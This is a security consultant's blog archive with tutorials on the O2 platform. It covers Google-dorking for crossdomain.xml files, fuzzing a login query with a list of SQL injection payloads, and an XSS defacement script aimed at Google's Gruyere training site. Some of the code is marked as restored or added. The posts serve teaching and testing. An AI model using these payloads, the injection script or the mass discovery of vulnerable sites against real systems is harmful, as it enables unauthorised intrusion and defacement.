Parsons Software Security Consulting Blog

Archive for the ‘software security’ Category

How to find Crossdomain.xml Cross Site Request Forgery with O2


Lately a lot of people have been talking about the security risk of an unrestricted crossdomain.xml. It is public knowledge that an attacker can abuse it to set up Cross Site Request Forgery: a Flash application served from any origin can send requests to the site carrying the victim’s cookies and read the responses.

Below is the sample content of the crossdomain.xml. This is a simple one; some of the big websites that have unrestricted crossdomain.xml files have a lot more in them. From the blogs I have read in the community and from the HP WebInspect remediation guide, “exploiting a vulnerability involves crafting a custom Flash application”.


<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*"/>
</cross-domain-policy>


The fix is “not to design and deploy Flash APIs meant to be accessible to arbitrary third parties”. It is also recommended “to host these on a sub domain”. In practice that means listing only the specific domains that need access in allow-access-from, and leaving permitted-cross-domain-policies at master-only so that a policy file planted elsewhere on the host (in user-uploaded content, for example) is not honoured. We are not going to discuss how to exploit this vulnerability but rather how to find it in the wild with O2.

So let’s open up O2. I like using Dinis Cruz’s version because it is more powerful.

Then let’s open IE Automation.

Below is the default script in IE Automation that Dinis created. The default website is Google.

var ie = panel.add_IE().silent(true);
ie.open("http://www.google.com");   // the post says the default target is Google; the URL string itself was lost in extraction

The first script searches Google for crossdomain.xml files and collects the matching links in a text area. The loop body and the line that fills the text area did not survive extraction and are restored here; the O2 helper names used for that (set_Text, lineSeparated) are assumed.

//using O2.XRules.Database.Utils.O2

var topPanel = panel.clear().add_Panel();
var ie = topPanel.add_IE().silent(true);
ie.open("http://www.google.com");                                // target assumed from the post
ie.field("Search").value("inurl:crossdomain.xml filetype:xml");  // Google dork for policy files
ie.button("Google Search").click();

var targetUrls = new List<string>();
foreach(var link in ie.links().urls())
    if (link.ends("crossdomain.xml"))      // keep only direct links to policy files
        targetUrls.Add(link);

var listOfUrls = topPanel.insert_Left<Panel>(250).add_TextArea().wordWrap(false);
listOfUrls.set_Text(targetUrls.lineSeparated());   // one URL per line
return targetUrls;

The second script replaces the text area with a tree view and shows the contents of whichever policy file is selected. The callback wiring and the loop body are restored the same way (afterSelect, add_Node and set_Text are assumed O2 helper names).

//using O2.XRules.Database.Utils.O2

var topPanel = panel.clear().add_Panel();
var ie = topPanel.add_IE().silent(true);
ie.open("http://www.google.com");
ie.field("Search").value("inurl:crossdomain.xml filetype:xml");
ie.button("Google Search").click();

var listOfUrls = topPanel.insert_Left<Panel>(350).add_TreeView();
var fileContents = listOfUrls.insert_Below<Panel>(200).add_SourceCodeViewer();

listOfUrls.afterSelect<string>(
    (selectedUrl)=> {
        var html = selectedUrl.uri().getHtml();   // fetch the selected crossdomain.xml
        fileContents.set_Text(html);              // and show it in the viewer
    });

foreach(var link in ie.links().urls())
    if (link.ends("crossdomain.xml"))
        listOfUrls.add_Node(link);

If the script executes properly it lists all the websites that potentially have this vulnerability inside O2. For a site to actually be vulnerable, allow-access-from has to have domain set to *. I do not want to expose which sites are vulnerable, for legal reasons. What is missing from the script is the rule that checks for the * value.
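The missing rule, as an added example that is not code from the original post or from the O2 platform. It is written in plain Python (xml.etree) so it runs without O2, but it does exactly what the script above lacks: parse a fetched crossdomain.xml and flag allow-access-from domain="*", along with the other settings (permitted-cross-domain-policies="all", secure="false", allow-http-request-headers-from domain="*") that a practitioner would report. The two sample policies are constructed here and are not taken from any real site; check_host is the only part that touches the network and is meant only for hosts you are authorised to test.

```python
"""Check a crossdomain.xml for the settings that make it exploitable (added example)."""
import xml.etree.ElementTree as ET
from typing import List, NamedTuple


class Finding(NamedTuple):
    severity: str   # "high", "medium" or "info"
    detail: str


def check_policy(xml_text: str) -> List[Finding]:
    """Return the risky settings found in one crossdomain.xml document."""
    findings: List[Finding] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # Flash Player ignores a policy it cannot parse, so this is not exploitable.
        return [Finding("info", f"not well-formed XML ({exc})")]
    if root.tag != "cross-domain-policy":
        return [Finding("info", f"root element is <{root.tag}>, not a Flash policy")]

    for el in root.iter("site-control"):
        if (el.get("permitted-cross-domain-policies") or "").lower() == "all":
            findings.append(Finding("medium",
                'permitted-cross-domain-policies="all": non-master policy files anywhere '
                'on the host (e.g. in user-uploaded content) are honoured'))

    for el in root.iter("allow-access-from"):
        domain = (el.get("domain") or "").strip()
        if domain == "*":
            findings.append(Finding("high",
                'allow-access-from domain="*": a SWF on any origin can send requests '
                "with the victim's cookies and read the responses"))
        elif domain.startswith("*."):
            findings.append(Finding("info", f'wildcard scope "{domain}": every subdomain is trusted'))
        if (el.get("secure") or "true").lower() == "false":
            findings.append(Finding("medium",
                f'secure="false" for "{domain}": an HTTP-served SWF may use this HTTPS policy'))

    for el in root.iter("allow-http-request-headers-from"):
        if (el.get("domain") or "").strip() == "*":
            findings.append(Finding("medium",
                'allow-http-request-headers-from domain="*": any origin may send custom headers'))
    return findings


def is_unrestricted(xml_text: str) -> bool:
    """The rule the O2 script is missing: True when any allow-access-from has domain="*"."""
    return any(f.severity == "high" for f in check_policy(xml_text))


def check_host(host: str, timeout: float = 5.0) -> List[Finding]:
    """Fetch http://<host>/crossdomain.xml and check it (only for hosts you are authorised to test)."""
    import urllib.request
    url = f"http://{host}/crossdomain.xml"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return check_policy(resp.read().decode("utf-8", "replace"))
    except (OSError, ValueError) as exc:
        return [Finding("info", f"could not fetch {url}: {exc}")]


# Constructed sample policies (not from any real site).
OPEN_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*"/>
</cross-domain-policy>
"""

RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com" secure="true"/>
  <allow-access-from domain="api.example.com"/>
</cross-domain-policy>
"""

if __name__ == "__main__":
    for name, policy in (("open", OPEN_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(name, "UNRESTRICTED" if is_unrestricted(policy) else "restricted")
        for f in check_policy(policy):
            print("  ", f.severity, f.detail)
```

The parse-error branch matters in the wild: a lot of the hits the Google search returns are HTML error pages or half-written policies, and Flash Player does not honour those, so they should not be reported as vulnerable.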

Many thanks to Dinis, all the security researchers who have been blogging about this vulnerability, HP, IBM and the Netsparker crew.

Matt Parsons, CISSP, MSM

mparsons [at]

Parsons Software Security Consulting, LLC: Securing the Internet one application at a time.

Written by mparsons1980

December 2, 2010 at 7:40 pm

SQL injection with O2 and the FuzzDB Database plugin


O2 Database plugin testing for SQL injection.

Now that we have covered XSS with O2, we are going to go through SQL injection using FuzzDB.

Adam Muntner created fuzzdb using a number of sources. In the project’s own words:

fuzzdb helps identify security flaws in applications by aggregating known attack patterns, predictable resource names, and server response messages to create a comprehensive, repeatable set of malformed input test cases.

svn checkout fuzzdb-read-only 

This code uses the fuzzdb plugin and fuzzes the database with different SQL injection payloads. It then takes a screenshot of each successful iteration.
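The same loop, as an added example that is not the post’s O2 script or FuzzDB’s own code. It runs the payload list against an in-memory SQLite database so it works offline, records an outcome per payload (error, bypass, no effect) instead of taking a screenshot, and runs the identical payloads against a parameterised version of the query to show that none of them has an effect there. The payload list is a constructed subset in the style of fuzzdb’s generic SQL injection lists, and the users table is constructed too.

```python
"""Fuzz a login query with SQL injection payloads, FuzzDB style (added example)."""
import sqlite3
from typing import Callable, Dict, List, NamedTuple

# Constructed probes in the style of fuzzdb/attack/sql-injection/ (not copied from it).
SQLI_PAYLOADS: List[str] = [
    "'",                        # unbalanced quote: a raw DB error confirms string concatenation
    '"',                        # double quote: harmless inside a single-quoted literal
    "' OR '1'='1",              # tautology without a comment: defeated here by AND precedence
    "' OR 1=1--",               # tautology that comments out the rest of the WHERE clause
    "admin'--",                 # log in as a known user without the password
    "' UNION SELECT 1,2,3--",   # column-count probe (wrong count for this query, so it errors)
    "%27%20OR%201%3D1--",       # URL-encoded variant: inert unless the server decodes it first
]


class Outcome(NamedTuple):
    kind: str      # "error", "bypass" or "no_effect"
    detail: str    # the DB error text or the rows returned


LoginFn = Callable[[sqlite3.Connection, str, str], list]


def build_db() -> sqlite3.Connection:
    """Constructed users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Builds the query by string concatenation: the bug under test."""
    sql = ("SELECT id, username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters: payloads stay data, never SQL."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def fuzz_login(login: LoginFn, payloads: List[str] = SQLI_PAYLOADS) -> Dict[str, Outcome]:
    """Send each payload as the username with a password that matches no account."""
    conn = build_db()
    results: Dict[str, Outcome] = {}
    for payload in payloads:
        try:
            rows = login(conn, payload, "not-the-password")
        except sqlite3.Error as exc:
            results[payload] = Outcome("error", str(exc))      # error-based evidence
            continue
        # Any row back means authentication was bypassed: no valid password was supplied.
        results[payload] = Outcome("bypass" if rows else "no_effect", repr(rows))
    return results


def successful(results: Dict[str, Outcome]) -> List[str]:
    """The payloads worth reporting (the iterations the O2 script would screenshot)."""
    return [p for p, o in results.items() if o.kind != "no_effect"]


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_login), ("parameterised", safe_login)):
        res = fuzz_login(fn)
        print(f"{name}: {len(successful(res))} of {len(res)} payloads had an effect")
        for p, o in res.items():
            print(f"  {p!r:28} {o.kind:9} {o.detail[:60]}")
```

Two of the “no effect” results are the instructive ones: ' OR '1'='1 fails only because AND binds tighter than OR in this particular query, and the URL-encoded probe fails only because nothing decoded it, so neither result proves the query is safe. That is why a fuzz run has to be read per payload rather than as a single pass/fail.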

The screenshots are above. If you have any questions feel free to email me at

Once again, Parsons Software Security Consulting, LLC is offering unauthenticated scans for the holidays. A few people have taken me up on this offer.

Written by mparsons1980

November 25, 2010 at 3:04 am

XSS with the O2 Script Editor: Defacement on Gruyere


Today’s post goes step by step through an XSS defacement of Gruyere.

We already created our XSS builder with O2. Now we are going to do an XSS defacement.

Above is the regular Gruyere login page. Below is the defacement produced by the IE script execution.

Here is all the code needed for the defacement.

using O2.XRules.Database.Utils;
using O2.XRules.Database.APIs;
using O2.External.SharpDevelop.Ascx;
using O2.External.SharpDevelop.ExtensionMethods;
using O2.DotNetWrappers.Network;
using O2.DotNetWrappers.DotNet;
using O2.DotNetWrappers.Windows;
using O2.DotNetWrappers.ExtensionMethods;
using O2.Views.ASCX.classes.MainGUI;
using O2.Views.ASCX.CoreControls;
using O2.Views.ASCX.ExtensionMethods;
using O2.Kernel.ExtensionMethods;
using O2.Kernel;
using O2.Interfaces;
using System.Linq;
using System.Xml.Linq;
using System.Xml;
using System.Collections.Generic;
using System.Windows.Forms;
using System.Drawing;
using System;
using O2.XRules.Database.Utils.O2;

public class DynamicType
{
    public void dynamicMethod(object returnData, System.Windows.Forms.Panel panel)
    {
        // Open an embedded IE; silent(true) suppresses pop-ups so the script is not blocked.
        // The Gruyere login URL passed to open(...) did not survive extraction of the post.
        var ie = panel.add_IE().silent(true);

        // Locate the DIV holding the "Gruyere: Login" text; the defacement is injected just before it.
        var target = ie.elements("DIV").str("Gruyere: Login");

        // Inject a heading, a link and a deferred script that rewrites the first link and
        // the first image on the page. The host part of the image URL was lost in extraction
        // and is left empty here rather than guessed.
        target.injectHtml("beforeBegin",
            "<h1>O2 Platform Demos</h1>" +
            "The best way to learn about the security vulnerabilities of this website is to use the " +
            "<a href=\"http://o2platform\">OWASP O2 Platform</a>" +
            "<script DEFER> " +
            " //alert(document.links[0].href);" +
            " document.links[0].href = \"\";" +
            " document.images[0].src = \"\" + \"a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";" +
            " //alert(document.images[0].sec);" +
            " //document.images[1].href = " +
            " //alert(document.images[1].href);" +
            "</script>");

        //using O2.XRules.Database.Utils.O2
    }
}


This is what Dinis created and what is under the hood of these little scripts. It is a bit more complex.

I was speaking to Dinis and, after I questioned him about the code, he explained some of it to me in his own words:

– what happens when you select ‘show/hide generated source code’ is that you see the actual method that gets compiled (basically I automatically put the text you put on the main script window inside that public object dynamicMethod(object returnData, string testString, int testNumber) method)

– the silent(true) in IE is just to prevent pop-ups (and sometimes you need to put it to false since you need to act on those popups)

– the ‘flash()’ method is used to slow down the script execution a little bit, so that you can see visually which HTML field is being edited

If you have any questions, e-mail me. Matt Parsons, CISSP, MSM

Parsons Software Security Consulting, LLC

Written by mparsons1980

November 25, 2010 at 1:39 am

XSS Exploit with O2 continued on Google Demo Hack Site


In the spirit of Cross Site Scripting exploits with O2, we will continue exploiting using the O2 XSS exploit script. This time I will use the script from Dinis Cruz’s powerful O2.

We are going to select XSS builder.

Google is kind enough to offer an attack website, Gruyere. Only attack websites you are authorized to attack. Parsons Software Security Consulting, LLC assumes no liability for any damage you do through unauthorized hacking.

We are going to attack the login page.

The website is vulnerable to XSS.  Next time we will create a script to show this attack and do a defacement.

If you have any questions or comments feel free to contact Matt Parsons.

Also, Parsons Software Security Consulting, LLC is offering a free unauthenticated web penetration test to the first 10 companies that respond by the end of 2010.

Written by mparsons1980

November 24, 2010 at 9:49 pm